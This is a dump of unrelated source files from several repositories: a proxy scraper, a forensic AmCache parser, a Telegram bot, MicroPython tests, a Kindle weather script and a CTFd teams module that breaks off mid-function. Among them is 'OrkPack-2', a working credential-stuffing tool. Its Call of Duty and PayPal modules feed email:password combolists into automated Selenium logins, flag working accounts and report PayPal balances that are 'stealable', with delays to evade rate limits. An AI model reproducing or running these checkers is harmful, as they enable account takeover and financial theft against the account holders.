def suite(): suite = unittest.TestLoader().loadTestsFromTestCase(torrent) return suite ```
{ "source": "0x06060606/OrkPack-2", "score": 3 }
#### File: 0x06060606/OrkPack-2/Main.py ```python import os, sys Modules = ["Checkers", "Tools"] for root, dirs, files in os.walk("./Modules"): for filename in files: Modules.append(filename[:-3]) def runModule(ModuleCC): ModulePath = "./Menus/" + ModuleCC + ".py" os.system("python3 " + ModulePath) def MainMenu(): os.system('cls' if os.name=='nt' else 'clear') print(" Welcome to _CheckTheDeck_! ") print(" This tool was supplied by @OrkSec ") print(" And Revamped by @0x06060606 ") print(" What Menu would you like to enter? ") for index, value in enumerate(Modules): print(" [" + str(index) + "]" , value) print(" [" + str(len(Modules)) + "]" , "Exit ") choice = input(" ==> ") if int(choice) == int(len(Modules)): exit() if int(choice) <= len(Modules): runModule(Modules[int(choice)]) else: MainMenu() try: MainMenu() except ValueError: os.system("python3 " + sys.argv[0]) except KeyboardInterrupt: exit() ``` #### File: Menus/Modules/CallOfDuty.com.py ```python import requests, re, time, json from selenium import webdriver from selenium.webdriver.firefox.options import Options from selenium import webdriver from bs4 import BeautifulSoup options = Options() options.set_headless(headless=True) class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def login(username, password): driver = webdriver.Firefox(firefox_options=options) driver.get("https://profile.callofduty.com/cod/login") driver.find_element_by_xpath("//input[@id='username']").send_keys(username) driver.find_element_by_xpath("//input[@id='password']").send_keys(password) driver.find_element_by_xpath("//button[@id='login-button']").click() driver.get("https://my.callofduty.com/de/player/combatrecord") driver.refresh(); elements=driver.find_elements_by_xpath("//div[@class='stats-header']/h2[@class='heading']") if not elements: NotExistent=driver.find_elements_by_xpath("//div[@class='no-gameplay-found']/h1") if not NotExistent: print(bcolors.FAIL + " [X] " + username + ":" + password + " | Login wrong." + bcolors.ENDC) # driver.close() else: hasGames = False print(bcolors.WARNING + " [X] " + username + ":" + password + " | Has never played before." + bcolors.ENDC) driver.close() else: hasGames = True KD = driver.find_elements_by_xpath("/html[@class='wf-opensans-n3-active wf-opensans-n7-active wf-montserrat-n4-active wf-opensanscondensed-n3-active wf-opensanscondensed-n7-active wf-opensans-n4-active wf-active']/body[@class='with-sso-bar desktop sso-logged-in sso-auth-known']/div[@class='page-content-container']/div[@class='page-content parsys']/div[@class='atvi-component atvi-content-tile ignore-id template ']/div[@id='mycod']/div[@id='app']/main[@class='main-content']/div[@class='dashboard-page-new main-content-inner inner-wrapper bo4']/section[@class='weekly-stats item']/div[@class='chart-wrap']/div[@class='weekly-stats__inner']/div[@class='StatProgressCircle bo4']/div[@class='StatProgressCircle__stats']/span[@class='value']").get_attribute('value') print(bcolors.OKGREEN + " [O] " + username + ":" + password + " | Has a KD Ratio of " + KD + bcolors.ENDC) element = elements[0] driver.close() def storeArray(combolistin): with open(combolistin.replace(" ", ""), 'r') as myfile: for line in myfile: line = line.replace('\n', '') email = line.split(":")[0] password = line.split(":")[1] login(email, password) def askForCombo(): print(" Please drag and drop a email:password combolist. ") combolistFullPath = input(" ==> ") storeArray(combolistFullPath) try: os.system('cls' if os.name=='nt' else 'clear') print(" Welcome to the " + os.path.basename(__file__)[:-3] + " Checker! ") askForCombo() except KeyboardInterrupt: exit() ``` #### File: Menus/Modules/Freebitco.in.py ```python import requests, webbrowser, os, sys, time, inspect, json, re url = "https://home.nest.com/session" class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def welcome(): os.system('cls' if os.name=='nt' else 'clear') print(" Welcome to the " + os.path.basename(__file__)[:-3] + " Checker! ") importCombolist() def importCombolist(): print(" Please drag and drop a combolist here. ") combolistPath = input(' ==> ') with open(combolistPath.replace(" ", ""), 'r') as myfile: for line in myfile: payload = 0 line = line.replace('\n', '') email = line.split(":")[0] password = line.split(":")[1] payload = {'email': email, 'password': password} try: welcome() except KeyboardInterrupt: exit() ``` #### File: Menus/Modules/Paypal.com.py ```python import requests, re, time, os, sys, json, time from selenium import webdriver from selenium.webdriver.firefox.options import Options from selenium import webdriver from bs4 import BeautifulSoup import speech_recognition as sr options = Options() options.set_headless(headless=False) CURSOR_UP_ONE = '\x1b[0A' ERASE_LINE = '\x1b[lol' class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' r = sr.Recognizer() delay = 10 def countdown(t): while t: mins, secs = divmod(t, 60) timeformat = '{:02d}:{:02d}'.format(mins, secs) sys.stdout.write("\r Waiting " + timeformat + " Seconds Before the next login... ") sys.stdout.flush() time.sleep(1) t -= 1 sys.stdout.write(CURSOR_UP_ONE) sys.stdout.write("\n") sys.stdout.flush() def login(username, password): time.sleep(10) driver = webdriver.Firefox(firefox_options=options) driver.get("https://www.paypal.com/us/signin") driver.find_element_by_xpath("//input[@id='email']").send_keys(username) driver.find_element_by_xpath("//button[@id='btnNext']").click() time.sleep(5.6543) driver.find_element_by_xpath("//input[@id='password']").send_keys(password) driver.find_element_by_xpath("//button[@id='btnLogin']").click() driver.get("https://www.paypal.com/myaccount/summary/") elements=driver.find_elements_by_xpath("//span[@class='vx_text-1 cw_tile-currency test_balance-tile-currency']") if not elements: print(bcolors.FAIL + " [X] " + username + ":" + password + "\t | No Amount ctealable lol. No Span found " + bcolors.ENDC) driver.close() else: cashValue = driver.find_elements_by_xpath("//span[@class='vx_text-1 cw_tile-currency test_balance-tile-currency']").text print(bcolors.OKGREEN + " [YAY] " + username + ":" + password + " | Found some cash! Amount we found: (" + cashValue + ") " + bcolors.ENDC) driver.close() def storeArray(combolistin): print(" We will wait "+str(delay)+" Seconds between every check! ") with open(combolistin.replace(" ", ""), 'r') as myfile: for line in myfile: line = line.replace('\n', '') email = line.split(":")[0] password = line.split(":")[1] login(email, password) def askForCombo(): print(" Please drag and drop a email:password combolist. ") combolistFullPath = input(" ==> ") storeArray(combolistFullPath) try: os.system('cls' if os.name=='nt' else 'clear') print(" Welcome to the " + os.path.basename(__file__)[:-3] + " Checker! ") askForCombo() except KeyboardInterrupt: exit() ```
{ "source": "0x06060606/Soteria_Proxy-Scraper", "score": 2 }
#### File: 0x06060606/Soteria_Proxy-Scraper/index.py ```python import json, requests, sys import socket, urllib3, time import os, random, threading from time import time as tom cnt=(0) ping=(0) count=(0) threads=(0) working=(0) loop=(True) debugg=(False) not_working=(0) key=('Test-Key') types=(['http','https','socks4','socks5']) headers=({'Content-Type': 'application/json', 'Authorization': '{0}'.format(key)}) def debug(msg): global debugg if debugg: print(" [!] Debug >> "+str(msg)) try: if sys.argv[1]: maxThreads=(int(sys.argv[1])) else: maxThreads=(10) except Exception as e: debug(e) maxThreads=(10) with open("errors.dat", "a+") as f: f.write(str('No_Arg_MaxThreads')) f.write("\n") try: if sys.argv[2]: perThread=(int(sys.argv[2])) else: perThread=(1) except Exception as e: debug(e) perThread=(1) with open("errors.dat", "a+") as f: f.write(str('No_Arg_PerThread')) f.write("\n") try: if sys.argv[3]: if int(sys.argv[3])==1: debugg=(True) else: debugg=(False) else: debugg=(False) except Exception as e: debug(e) debugg=(False) def getProxy(proxType): debug(proxType) api_url=('{0}{1}'.format("https://proxy.soteria.cf/", proxType)) response=(requests.get(api_url, headers=headers)) if response.status_code == 200: proxy=(json.loads(response.content.decode('utf-8'))) debug(proxy) return proxy else: debug(json.loads(response.content.decode('utf-8'))) return None def check(proxy, proxType, url): global ping, working, not_working try: bef=(tom()) requests.get(url,proxies={''+proxType:proxType+'://'+proxy},timeout=(2,5)) aft=(tom()) ping=(str(aft-bef)) working+=(1) if timeSinceLastRun < 300: with open(str(proxType)+".dat", "a+") as f: f.write(proxy) debug(proxy) f.write("\n") else: with open(str(proxType)+".dat", "w") as f: f.write(proxy) debug(proxy) f.write("\n") return "Working!" except Exception as e: debug(e) not_working+=(1) aft=(tom()) ping=(str(aft-bef)) if ('ConnectionPool' in str(e) or 'BadStatusLine' in str(e)): pass else: with open("errors.dat", "a+") as f: f.write(str(e)) f.write("\n") pass return "Not Working!" def cleanDupes(Type): try: uniqlines=(set(open(str(Type)+".dat").readlines())) out=(open(str(Type)+".temp.dat", 'w').writelines(uniqlines)) with open(str(Type)+".temp.dat", "r") as f: out=(open(str(Type)+".dat", 'w').writelines(f.readlines())) os.remove(str(Type)+".temp.dat") except Exception as e: debug(e) with open("errors.dat", "a+") as f: f.write(str(e)) f.write("\n") def run(n): global cnt, count, perThread, ping try: p=(0) while (p < perThread): magic=(random.randint(1,4)) if (magic==1): try: count+=(1) http=(getProxy('http')) print(" [Thread-"+str(n)+"] HTTP = "+http[0]+":"+http[1]+" | "+str(check(http[0]+":"+http[1],'http',"http://www.google.com/"))+" | "+str(ping)+" ") except Exception as e: debug(e) print(" [Thread-"+str(n)+"] HTTP = Malformed Proxy Error ") if (magic==2): try: count+=(1) https=(getProxy('https')) print(" [Thread-"+str(n)+"] HTTPS = "+https[0]+":"+https[1]+" | "+str(check(https[0]+":"+https[1],'https',"https://www.google.com/"))+" | "+str(ping)+" ") except Exception as e: debug(e) print(" [Thread-"+str(n)+"] HTTPS = Malformed Proxy Error ") if (magic==3): try: count+=(1) socks4=(getProxy('socks4')) print(" [Thread-"+str(n)+"] Socks4 = "+socks4[0]+":"+socks4[1]+" | "+str(check(socks4[0]+":"+socks4[1],'socks4',"https://www.google.com/"))+" | "+str(ping)+" ") except Exception as e: debug(e) print(" [Thread-"+str(n)+"] Socks4 = Malformed Proxy Error ") if (magic==4): try: count+=(1) socks5=(getProxy('socks5')) print(" [Thread-"+str(n)+"] Socks5 = "+socks5[0]+":"+socks5[1]+" | "+str(check(socks5[0]+":"+socks5[1],'socks5',"https://www.google.com/"))+" | "+str(ping)+" ") except Exception as e: debug(e) print(" [Thread-"+str(n)+"] Socks5 = Malformed Proxy Error ") p+=(1) else: debug('Thread '+str(n)+' Done!') cnt+=(1) return except KeyboardInterrupt: return except Exception as e: debug(e) with open("errors.dat", "a+") as f: f.write(str(e)) f.write("\n") def finish(): global cnt, working, loop, not_working, befTime, count, types try: while (loop): while (cnt == maxThreads): for typ in types: cleanDupes(typ) with open("time.dat", "w") as f: f.write(str(tom())) if (count==not_working+working): aftTime=(tom()) print(" \r\n") print(" [#] Finished Proxy API Scraping in "+str(aftTime-befTime)+" ") print(" [#] "+str(working)+" working and "+str(not_working)+" not working ") print(" [#] out of "+str(not_working+working)+" tested! ") print("\r\n ") cnt+=(1) loop=(False) else: aftTime=(tom()) print(" \r\n") print(" [!] Minimal Error Found in Memory! {"+str(count)+":"+str(cnt)+"} ") print(" [#] Finished Proxy API Scraping in "+str(aftTime-befTime)+" ") print(" [#] "+str(working)+" working and "+str(not_working)+" not working ") print(" [#] out of "+str(not_working+working)+" tested! ") print("\r\n ") cnt+=(1) loop=(False) return else: pass except KeyboardInterrupt: return except Exception as e: debug(e) with open("errors.dat", "a+") as f: f.write(str(e)) f.write("\n") if __name__ == "__main__": try: os.system('cls' if os.name=='nt' else 'clear') print("""\r\n\ ____ _ _ / ___| ___ | |_ ___ _ __(_) __ _ \___ \ / _ \| __/ _ \ '__| |/ _` | ___) | (_) | || __/ | | | (_| | |____/ \___/ \__\___|_| |_|\__,_|""") print("\n\r [2.0] \r\n ") with open("time.dat", "r") as f: timeSinceLastRun=(int(tom())-int(float(f.read()))) debug(timeSinceLastRun) print(" [#] Starting Proxy API Scraping... (ctrl+c to stop) ") print(" \r\n") while (threads < maxThreads): befTime=(tom()) threading.Thread(target=run, args=(threads,)).start() debug(threads) threads+=(1) else: threading.Thread(target=finish).start() exit except KeyboardInterrupt: loop=(False) print(" \r\n") print(" [#] Force Stopped Proxy API Scraping! ") print(" [#] "+str(working)+" working and "+str(not_working)+" not working ") print(" [#] out of "+str(not_working+working)+" tested! ") print("\r\n ") exit except Exception as e: debug(e) with open("errors.dat", "a+") as f: f.write(str(e)) f.write("\n") ```
{ "source": "0x09AL/appcompatprocessor", "score": 2 }
#### File: appcompatprocessor/Ingest/amcache_raw_hive.py ```python import settings import logging import struct from ingest import Ingest from appAux import loadFile import pyregf from AmCacheParser import _processAmCacheFile_StringIO import settings import ntpath from amcache_miracquisition import Amcache_miracquisition logger = logging.getLogger(__name__) # Module to ingest AmCache data # File extension must be '.hve' # Hostname = File name # Note: Exactly the same as amcache_miracquisition with a different file_name_filter class Amcache_Raw_hive(Ingest): ingest_type = "amcache_raw_hive" file_name_filter = "(?:.*)(?:\/|\\\)(.*)\.hve$" def __init__(self): super(Amcache_Raw_hive, self).__init__() def getHostName(self, file_name_fullpath): if not settings.__PYREGF__: logger.warning("AmCache processing disabled (missing pyregf) skipping file: %s" % file_name_fullpath) else: return super(Amcache_Raw_hive, self).getHostName(file_name_fullpath) def checkMagic(self, file_name_fullpath): magic_ok = False # Quick and dirty check file_object = loadFile(file_name_fullpath) tmp = struct.unpack( '4s' , file_object.read(4) ) if tmp[0] == "regf": # Perform a deeper check using pyregf regf_file = pyregf.file() regf_file.open_file_object(file_object, "r") magic_key = regf_file.get_key_by_path(r'Root\File') regf_file.close() del regf_file if magic_key is not None: magic_ok = True file_object.close() del file_object return magic_ok def calculateID(self, file_name_fullpath): instanceID = None file_object = loadFile(file_name_fullpath) regf_file = pyregf.file() regf_file.open_file_object(file_object, "r") tmp = regf_file.get_key_by_path(r'Root\File') if regf_file.get_key_by_path(r'Root\File') == None: logger.warning("Not an AmCache hive! [%s]" % file_name_fullpath) else: instanceID = regf_file.root_key.last_written_time # Need to close these or the memory will never get freed: regf_file.close() del regf_file file_object.close() del file_object return instanceID def processFile(self, file_fullpath, hostID, instanceID, rowsData): rowNumber = 0 file_object = loadFile(file_fullpath) rows = _processAmCacheFile_StringIO(file_object) file_object.close() for r in rows: namedrow = settings.EntriesFields(HostID = hostID, EntryType = settings.__AMCACHE__, RowNumber = rowNumber, FilePath = (None if r.path == None else ntpath.dirname(r.path)), FileName = (None if r.path == None else ntpath.basename(r.path)), Size = r.size, ExecFlag = 'True', SHA1 = (None if r.sha1 == None else r.sha1[4:]), FileDescription = r.file_description, FirstRun = r.first_run, Created = r.created_timestamp, Modified1 = r.modified_timestamp, Modified2 = r.modified_timestamp2, LinkerTS = r.linker_timestamp, Product = r.product, Company = r.company, PE_sizeofimage = r.pe_sizeofimage, Version_number = r.version_number, Version = r.version, Language = r.language, Header_hash = r.header_hash, PE_checksum = r.pe_checksum, SwitchBackContext = r.switchbackcontext, InstanceID = instanceID) rowsData.append(namedrow) rowNumber += 1 ```
{ "source": "0x0bloodyknight/jdan734-bot", "score": 3 }
#### File: config/lib/driver.py ```python from aiovk.drivers import BaseDriver import aiohttp class HttpDriver(BaseDriver): def __init__(self, timeout=10, loop=None, session=None): super().__init__(timeout, loop) async def post_json(self, url, params, timeout=None): async with aiohttp.ClientSession() as session: async with session.post(url, data=params, timeout=timeout or self.timeout) as response: return response.status, await response.json() async def get_bin(self, url, params, timeout=None): async with aiohttp.ClientSession() as session: async with session.get(url, data=params, timeout=timeout or self.timeout) as response: return response.status, await response.read() async def get_text(self, url, params, timeout=None): async with aiohttp.ClientSession() as session: async with session.get(url, data=params, timeout=timeout or self.timeout) as response: return response.status, await response.text(), response.real_url async def post_text(self, url, data, timeout=None): async with aiohttp.ClientSession() as session: async with session.post(url, data=data, timeout=timeout or self.timeout) as response: return response.status, await response.text(), response.real_url async def close(self): await self.session.close() ``` #### File: config/lib/filters.py ```python import asyncio import logging from .text import code from ..bot import bot class ResendLogs(logging.Filter): def filter(self, record): loop = asyncio.get_event_loop() loop.create_task(self.send_to_tg(record)) return True async def send_to_tg(self, record): await bot.send_message(-1001435542296, code(record.msg), parse_mode="HTML") class NoRunningJobFilter(logging.Filter): def filter(self, record): return not record.getMessage().startswith("Running job Every") ``` #### File: config/lib/middleware.py ```python import os import yaml import i18n from .text import fixHTML from aiogram.contrib.middlewares.i18n import I18nMiddleware as I18nMiddlewareBase class I18nMiddleware(I18nMiddlewareBase): def t(self, singular, plural=None, n=1, locale=None, enable_patch=False, prepare_kwargs=False, **kwargs): self.i18n = i18n self.i18n.load_path.append(self.path) res = self.gettext(singular, plural, n, locale) lang = self.ctx_locale.get() lang = self.default if lang is None else lang lang = "uk" if lang == "ua" else lang self.i18n.set("locale", lang) self.i18n.set("fallback", self.default) if prepare_kwargs: for arg in kwargs: kwargs[arg] = fixHTML(kwargs[arg]) try: if enable_patch: raise TypeError return self.i18n.t(res, **kwargs) except TypeError: path = f"{self.path}/{res.split('.')[0]}.{{lang}}.yml" if not os.path.exists(path.format(lang=lang)): lang = self.default with open(path.format(lang=lang), encoding="UTF-8") as f: locale = yaml.safe_load(f.read()) translate = locale.get(lang).get(res.split(".")[1]) if isinstance(translate, str): return translate return [_.format(**kwargs) if isinstance(_, list) else _ for _ in translate] ``` #### File: bot/dev/crypto.py ```python import hashlib from random import choice from ..config import dp, _ from ..lib import handlers from ..lib.text import code @dp.message_handler(commands=["sha256"]) @handlers.get_text async def sha256(message, text): text = bytearray(text.encode("utf-8")) crypt = hashlib.sha256(text).hexdigest() await message.reply(crypt) @dp.message_handler(commands=["generate_password", "password"]) @handlers.parse_arguments(2) async def password(message, options): try: password_len = int(options[1]) except ValueError: await message.reply(_("error.pass_len_required")) return if password_len > 4096: await message.reply(_("errors.message_len"), parse_mode="Markdown") return elif password_len < 6: await message.reply(_("errors.pass_crypt_is_low"), parse_mode="Markdown") return password = "" symbols = [] symbols.extend(list("abcdefghijklmnopqrstuvwxyz")) symbols.extend(list("abcdefghijklmnopqrstuvwxyz".upper())) symbols.extend(list('~!@#$%^&*()_+-=`[]\\}{|;\':"<>,./?')) symbols.extend(list("0123456789")) for __ in range(0, password_len): password += choice(symbols) await message.reply(code(password), parse_mode="HTML") ``` #### File: bot/dev/text.py ```python from ..config import dp from ..lib import handlers @dp.message_handler(commands=["title"]) @handlers.get_text async def title(message, text): await message.reply(text.title()) @dp.message_handler(commands=["upper"]) @handlers.get_text async def upper(message, text): await message.reply(text.upper()) @dp.message_handler(commands=["lower"]) @handlers.get_text async def lower(message, text): await message.reply(text.lower()) @dp.message_handler(commands=["markdown"]) @handlers.get_text async def markdown(message, text): await message.reply(text, parse_mode="Markdown") ``` #### File: bot/lib/convert_bytes.py ```python def convert_bytes(num): for x in ['bytes', 'KB', 'MB', 'GB', 'TB']: if num < 1024.0: return f"{round(num, 2)} {x}" num /= 1024.0 ``` #### File: bot/lib/libtree.py ```python from aiogram.utils import json # символы TAB = " " MIDDLE_ITEM = "├" END_ITEM = "└" NO_ITEM = "│" ITEM = "─" def iter_last(iterable): iterable = iter(iterable) try: p = next(iterable) except StopIteration: return False for i in iterable: yield p, False p = i yield p, True def make_tree(d, title="root", default_line="") -> str: lines = list() lines.append(title) if isinstance(d, list): d = {str(i): val for i, val in enumerate(d)} for (key, val), end in iter_last(d.items()): if end: before_item = END_ITEM else: before_item = MIDDLE_ITEM line = default_line line += f"{before_item}{ITEM}" if isinstance(val, dict) or isinstance(val, list): dline = default_line dline += (NO_ITEM if not end else " ") + " " val = make_tree(val, title=key, default_line=dline) line += val else: line += f"{key}: {val}" lines.append(line) return "\n".join(lines) ``` #### File: bot/memes/memes.py ```python from ..config import bot, dp, _ async def send_meme(message, text): try: await message.delete() except Exception: pass try: await bot.send_message( message.chat.id, text, reply_to_message_id=message.reply_to_message.message_id ) except AttributeError: await message.answer(text) memes = { "bylo": "Было", "ne_bylo": "Не было", "rzaka": _("ban.rzaka"), "rzaka_full": _("ban.rzaka_full"), "rzaka_time": 848393938347292929647492918363739304964682010 } @dp.message_handler(commands=["bylo"]) async def bylo(message): await send_meme(message, memes["bylo"]) @dp.message_handler(commands=["ne_bylo"]) async def ne_bylo(message): await send_meme(message, memes["ne_bylo"]) @dp.message_handler(commands=["rzaka"]) async def rzaka(message): await send_meme(message, memes["rzaka"]) @dp.message_handler(commands=["rzaka_full"]) async def rzaka_full(message): await send_meme(message, memes["rzaka_full"]) @dp.message_handler(commands=["rzaka_time"]) async def rzaka_time(message): await send_meme(message, memes["rzaka_time"]) @dp.message_handler(commands=["ban"]) async def ban(message): msg = message.text.split(maxsplit=1) if len(msg) == 1: await send_meme(message, "Бан") else: await send_meme(message, "Бан " + msg[1]) @dp.message_handler(commands=["fake"]) async def polak(message): try: await message.delete() except Exception: pass try: await bot.send_photo( message.chat.id, open("media/images/polak.jpg", "rb"), reply_to_message_id=message.reply_to_message.message_id ) except AttributeError: await message.answer_photo(open("media/images/polak.jpg", "rb")) ``` #### File: bot/network/memepedia.py ```python import pymemeru from ..config import dp, _ from ..lib import handlers from ..lib.text import cuteCrop @dp.message_handler(commands=["memepedia", "meme"]) @handlers.parse_arguments(2) async def mempep(message, params): try: search = await pymemeru.search(params[1]) except AttributeError: await message.reply(_("errors.not_found")) return page = await pymemeru.page(search[0]["name"]) if page[0] == "": await message.reply(cuteCrop(page[1], 4096), parse_mode="HTML") else: await message.reply_photo(page[0], caption=cuteCrop(page[1], 1000), parse_mode="HTML") ``` #### File: 0x0bloodyknight/jdan734-bot/bot.py ```python import asyncio import aioschedule from aiogram import executor from bot import * # noqa from bot.config import ( dp, polls, DELAY, RSS, VK, SCHEDULE, KATZ_BOTS, RSS_FEEDS, YOUTUBE, YOUTUBE_CHANNELS) from bot.timer import rss_task, youtube_task from bot.vk import vk_timer loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) async def scheduler(): if RSS: for feed in RSS_FEEDS: aioschedule.every(DELAY).seconds.do( rss_task, feed["url"], feed["channelid"], feed["chatid"] ) if YOUTUBE: for channel in YOUTUBE_CHANNELS: aioschedule.every(15).minutes.do( youtube_task, channel["channelid"], channel["chatid"] ) if VK: aioschedule.every(DELAY).seconds.do(vk_timer) if KATZ_BOTS: aioschedule.every(DELAY).seconds.do(polls.close_old) while True: await aioschedule.run_pending() await asyncio.sleep(5) async def startup(x): if SCHEDULE: asyncio.create_task(scheduler()) executor.start_polling(dp, loop=loop, on_startup=startup) ```
{ "source": "0x0ece/micropython", "score": 4 }
#### File: tests/basics/lexer.py ```python print(type(__debug__)) # short input exec("") exec("\n") exec("\n\n") exec("\r") exec("\r\r") print(eval("1")) print(eval("12")) print(eval("123")) print(eval("1\n")) print(eval("12\n")) print(eval("123\n")) print(eval("1\r")) print(eval("12\r")) print(eval("123\r")) # lots of indentation def a(x): if x: if x: if x: if x: if x: if x: if x: if x: if x: if x: if x: if x: if x: if x: if x: print(x) a(1) ```
{ "source": "0x0Eddine/kindle4weather", "score": 3 }
#### File: 0x0Eddine/kindle4weather/weather_api.py ```python import datetime import json from urllib2 import urlopen def _fetch_json(url): json_str = urlopen(url).read() return json.loads(json_str) def _parse_forecast(data_json): """ return [WeatherData] """ tmp_list = [] for data in data_json["forecast"]["simpleforecast"]["forecastday"]: tmp_list.append(WeatherData(data["icon"], data["high"]["celsius"], data["low"]["celsius"])) return tmp_list class WeatherData(object): def __init__(self, condition, temp_max, temp_min): self.condition = condition self.temp_max = temp_max self.temp_min = temp_min class WeatherAPI(object): _BASE_API_URL = "http://api.wunderground.com/api/" def __init__(self, api_key, lat, lon): url_api_key = "appid=%s" % api_key url_location = "lat=%s&lon=%s" % (lat, lon) forecast_json = _fetch_json( "%s/%s/forecast/q/%s,%s.json" % (WeatherAPI._BASE_API_URL, api_key, lat, lon)) self._data = _parse_forecast(forecast_json) self._today = datetime.date.today() def temp_max(self, day): """ Input day as integer, 0 means today, 1 means tomorrow, max is 3. """ if day > 3: raise Exception("Invalid day, should less or equal to 3") return self._data[day].temp_max def temp_min(self, day): if day > 3: raise Exception("Invalid day, should less or equal to 3") return self._data[day].temp_min def condition(self, day): if day > 3: raise Exception("Invalid day, should less or equal to 3") return self._data[day].condition @property def today(self): """ Return a object of datetime.date """ return self._today ``` #### File: 0x0Eddine/kindle4weather/weather_script.py ```python import codecs import datetime import os import sys from weather_api import WeatherAPI from argparse import ArgumentParser from aqi import aqi_get CODE_FOLDER = os.path.dirname(os.path.realpath(__file__)) OUTPUT = "/var/www/html/weather/weather.png" TMP_OUTPUT = "%s/weather.png" % CODE_FOLDER SVG_PORTRAIT_FILE = "%s/weather-script-preprocess.svg" % CODE_FOLDER SVG_LANSCAPE_FILE = "%s/weather-script-preprocess-landscape.svg" % CODE_FOLDER SVG_FILE = SVG_PORTRAIT_FILE SVG_OUTPUT = "%s/weather-script-output.svg" % CODE_FOLDER MAX_WEATHER_DAY_COUNT = 3 AQI_CITY = None def _exec(cmd): rc = os.system(cmd) if (rc != 0): print("`%s` failed with error %d" % (cmd, rc)) exit(rc) if len(sys.argv) < 4: print("Need 3 or more argument for API key, latitude, longitud, " "[is_landscape] [aqi_city_name_for_landscape]") exit(1) weather_obj = WeatherAPI(sys.argv[1], sys.argv[2], sys.argv[3]) if len(sys.argv) >= 5 and sys.argv[4] != 0: SVG_FILE = SVG_LANSCAPE_FILE if len(sys.argv) >= 6 and sys.argv[5]: AQI_CITY = sys.argv[5] # Open SVG to process output = codecs.open(SVG_FILE, "r", encoding="utf-8").read() _MAP = { "$I": WeatherAPI.condition, "$H": WeatherAPI.temp_max, "$L": WeatherAPI.temp_min, } for x in _MAP.keys(): for i in range(MAX_WEATHER_DAY_COUNT + 1): output = output.replace("%s%d" % (x, i), "%s" % _MAP[x](weather_obj, i)) # Replace refresh time output = output.replace("$TIME", datetime.datetime.now().strftime("%b %d %a %H:%M")) # Updaet AQI. TODO(Gris Ge): still place holder yet. if AQI_CITY is not None: output = output.replace("$AQI", str(aqi_get(AQI_CITY))) day_one = weather_obj.today # Insert days of week one_day = datetime.timedelta(days=1) days_of_week = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"] for i in range(MAX_WEATHER_DAY_COUNT + 1): output = output.replace("$D%s" % i, days_of_week[(day_one + i * one_day).weekday()]) # Write output codecs.open(SVG_OUTPUT, "w", encoding="utf-8").write(output) _exec("rsvg-convert --background-color=white -o %s %s" % (TMP_OUTPUT, SVG_OUTPUT)) _exec("pngcrush -c 0 -ow %s 1>/dev/null 2>&1" % TMP_OUTPUT) #_exec("mv -f '%s' '%s'" % (TMP_OUTPUT, OUTPUT)) ```
{ "source": "0x0elliot/CTFd", "score": 2 }
#### File: CTFd/CTFd/teams.py ```python from flask import Blueprint, abort, redirect, render_template, request, url_for from CTFd.cache import clear_team_session, clear_user_session from CTFd.exceptions import TeamTokenExpiredException, TeamTokenInvalidException from CTFd.models import TeamFieldEntries, TeamFields, Teams, db from CTFd.utils import config, get_config, validators from CTFd.utils.crypto import verify_password from CTFd.utils.decorators import authed_only, ratelimit, registered_only from CTFd.utils.decorators.modes import require_team_mode from CTFd.utils.decorators.visibility import ( check_account_visibility, check_score_visibility, ) from CTFd.utils.helpers import get_errors, get_infos from CTFd.utils.humanize.words import pluralize from CTFd.utils.user import get_current_user, get_current_user_attrs teams = Blueprint("teams", __name__) @teams.route("/teams") @check_account_visibility @require_team_mode def listing(): q = request.args.get("q") field = request.args.get("field", "name") filters = [] if field not in ("name", "affiliation", "website"): field = "name" if q: filters.append(getattr(Teams, field).like("%{}%".format(q))) teams = ( Teams.query.filter_by(hidden=False, banned=False) .filter(*filters) .order_by(Teams.id.asc()) .paginate(per_page=50) ) args = dict(request.args) args.pop("page", 1) return render_template( "teams/teams.html", teams=teams, prev_page=url_for(request.endpoint, page=teams.prev_num, **args), next_page=url_for(request.endpoint, page=teams.next_num, **args), q=q, field=field, ) @teams.route("/teams/invite", methods=["GET", "POST"]) @registered_only @require_team_mode def invite(): infos = get_infos() errors = get_errors() code = request.args.get("code") if code is None: abort(404) user = get_current_user_attrs() if user.team_id: errors.append("You are already in a team. You cannot join another.") try: team = Teams.load_invite_code(code) except TeamTokenExpiredException: abort(403, description="This invite URL has expired") except TeamTokenInvalidException: abort(403, description="This invite URL is invalid") team_size_limit = get_config("team_size", default=0) if request.method == "GET": if team_size_limit: infos.append( "Teams are limited to {limit} member{plural}".format( limit=team_size_limit, plural=pluralize(number=team_size_limit) ) ) return render_template( "teams/invite.html", team=team, infos=infos, errors=errors ) if request.method == "POST": if errors: return ( render_template( "teams/invite.html", team=team, infos=infos, errors=errors ), 403, ) if team_size_limit and len(team.members) >= team_size_limit: errors.append( "{name} has already reached the team size limit of {limit}".format( name=team.name, limit=team_size_limit ) ) return ( render_template( "teams/invite.html", team=team, infos=infos, errors=errors ), 403, ) user = get_current_user() user.team_id = team.id db.session.commit() clear_user_session(user_id=user.id) clear_team_session(team_id=team.id) return redirect(url_for("challenges.listing")) @teams.route("/teams/join", methods=["GET", "POST"]) @authed_only @require_team_mode @ratelimit(method="POST", limit=10, interval=5) def join(): infos = get_infos() errors = get_errors() user = get_current_user_attrs() if user.team_id: errors.append("You are already in a team. You cannot join another.") if request.method == "GET": team_size_limit = get_config("team_size", default=0) if team_size_limit: plural = "" if team_size_limit == 1 else "s" infos.append( "Teams are limited to {limit} member{plural}".format( limit=team_size_limit, plural=plural ) ) return render_template("teams/join_team.html", infos=infos, errors=errors) if request.method == "POST": teamname = request.form.get("name") passphrase = request.form.get("password", "").strip() team = Teams.query.filter_by(name=teamname).first() if errors: return ( render_template("teams/join_team.html", infos=infos, errors=errors), 403, ) if team and verify_password(passphrase, team.password): team_size_limit = get_config("team_size", default=0) if team_size_limit and len(team.members) >= team_size_limit: errors.append( "{name} has already reached the team size limit of {limit}".format( name=team.name, limit=team_size_limit ) ) return render_template( "teams/join_team.html", infos=infos, errors=errors ) user = get_current_user() user.team_id = team.id db.session.commit() 